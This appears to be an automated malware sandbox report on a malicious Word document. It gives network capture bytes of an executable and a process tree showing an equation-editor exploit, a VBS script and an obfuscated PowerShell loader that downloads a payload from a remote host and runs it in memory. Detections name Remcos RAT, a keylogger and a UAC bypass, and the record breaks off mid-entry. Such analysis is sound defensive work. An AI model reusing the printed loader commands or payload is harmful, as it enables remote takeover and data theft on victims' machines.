                                                                                                                                                                                                2024-09-30 14:24:33 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                                                                                                                                Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                                                                                                                                                                                                2024-09-30 14:24:33 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                                                                                                                                                                                                Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                                                                                                                                                                                                2024-09-30 14:24:33 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                                                                                                                                                                                                Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                                                                                                                                                                                                2024-09-30 14:24:33 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                                                                                                                                                                                                Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                                                                                                                                                                                                2024-09-30 14:24:33 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                                                                                                                                                                                                Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                                                                                                                                                                                                2024-09-30 14:24:33 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                                                                                                                                                                                                Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                                                                                                                                                                                                2024-09-30 14:24:33 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                                                                                                                                                                                                Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                                                                                                                                                                                                2024-09-30 14:24:33 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                                                                                                                                                                                                Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                                                                                                                                                                2024-09-30 14:24:33 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                                                                                                                                                                Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                                                                                                                                                                                                2024-09-30 14:24:33 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                                                                                                                                                                Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                                                                                                                                                                                                Statistics

                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                Behavior

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                Start time:10:24:04
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                                                Imagebase:0x13f7f0000
                                                                                                                                                                                                File size:1'423'704 bytes
                                                                                                                                                                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                Start time:10:24:23
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:543'304 bytes
                                                                                                                                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                Start time:10:24:27
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs"
                                                                                                                                                                                                Imagebase:0x180000
                                                                                                                                                                                                File size:141'824 bytes
                                                                                                                                                                                                MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                Start time:10:24:28
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                                                Imagebase:0x870000
                                                                                                                                                                                                File size:427'008 bytes
                                                                                                                                                                                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                Start time:10:24:29
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"
                                                                                                                                                                                                Imagebase:0x870000
                                                                                                                                                                                                File size:427'008 bytes
                                                                                                                                                                                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                Start time:10:24:35
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                Start time:10:24:39
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                Start time:10:24:39
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
